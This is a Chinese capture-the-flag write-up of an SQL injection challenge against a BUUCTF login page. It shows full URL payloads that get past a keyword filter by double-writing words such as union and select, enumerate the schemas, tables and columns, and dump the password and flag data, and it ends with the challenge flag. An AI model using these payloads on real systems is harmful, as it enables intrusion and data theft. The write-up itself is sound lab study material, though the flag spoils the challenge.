[TOC]
首先是熟悉的黑色窗体:
判读是哪种闭合:
发现单引号闭合报错,双引号闭合正常。
判断哪一种注入: 首先尝试一波万能密码:
没有出现报错提示,但是没有结果,可能是or被过滤了,再次验证:
确定or被过滤。尝试双写绕过:
发现成功通过,验证select union from 是否存在过滤:
发现select union from 均被过滤
总结:过滤的关键词有or select union from
查询数据库: ‘information_schema,mysql,performance_schema,test,ctf,geek’
http:/ / eff6acb0- bc04-4385 -9938 -01571e136359 .node4.buuoj.cn:81 / check.php ?username= admin& password= admin1% 27 uniunionon% 20 selselectect% 201 % 2 C2% 2 Cgroup_concat(schema_name)% 20 frfromom% 20 infoorrmation_schema.schemata% 20 % 23 / / 下面是转义后的字符?username= admin& password= admin1'uniunionon selselectect 1,2,group_concat(schema_name) frfromom infoorrmation_schema.schemata #
查询数据库表名: 发现information_schema这个数据库中有两个表:’b4bsql,geekuser’
http://eff6acb0-bc04-4385-9938-01571e136359.node4.buuoj.cn:81/check.php ?username=admin &password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(table_name)%20frfromom%20infoorrmation_schema.tables%20whwhereere%20table_schema%3Ddatabase()%23 // ?username=admin &password=admin1'uniunionon selselectect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()#
查询列名: 发现information_schema这个数据库表:b4bsql 下列名为:’id,username,password’
http://eff6acb0-bc04-4385-9938-01571e136359.node4.buuoj.cn:81/check.php ?username=admin &password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(column_name)%20frfromom%20infoorrmation_schema.columns%20whwhereere%20table_schema%3Ddatabase()%20anandd%20table_name%3D%27b4bsql%27%23 // ?username=admin &password=admin1'uniunionon selselectect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema=database() anandd table_name='b4bsql'#
查询字段名: Hello 2!
Your password is ‘i_want_to_play_2077,sql_injection_is_so_fun,do_you_know_pornhub,github_is_different_from_pornhub,you_found_flag_so_stop,i_told_you_to_stop,hack_by_cl4y,flag{9a1fb271-a74a-458a-b29a-e1c6432bb270}’
http://eff6acb0-bc04-4385-9938-01571e136359.node4.buuoj.cn:81/check.php ?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(passwoorrd)%20frfromom%20b4bsql%23 // ?username=admin&password=admin1'uniunionon selselectect 1,2,group_concat(passwoorrd) frfromom b4bsql#
直接搜索: 或者在数据库查询时发现ctf数据库,查询ctf数据库中的表名:
?username=admin&password=pwd %27 ununionion seselectlect 1,2, group_concat(table_name)frfromom(infoorrmation_schema.tables) whwhereere table_schema="ctf" %23
查询flag中的列名:
http://eff6acb0-bc04-4385-9938-01571e136359.node4.buuoj.cn:81/check.php ?username=admin &password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(column_name)%20frfromom%20infoorrmation_schema.columns%20whwhereere%20table_schema%3Ddatabase()%20anandd%20table_name%3D%27Flag%27%23
查询flag中的字段名:
?username=admin&password=pwd %27 ununionion seselectlect 1,2, group_concat(column_name) frfromom (infoorrmation_schema.columns) whwhereere table_name="Flag"%23
查询ctf库中Flag表中的flag字段:
http://eff6acb0-bc04-4385-9938-01571e136359.node4.buuoj.cn:81/check.php ?username=admin &password=pwd %27 ununionion seselectlect 1,2,group_concat(flag)frfromom(ctf.Flag)%23
得到Flag。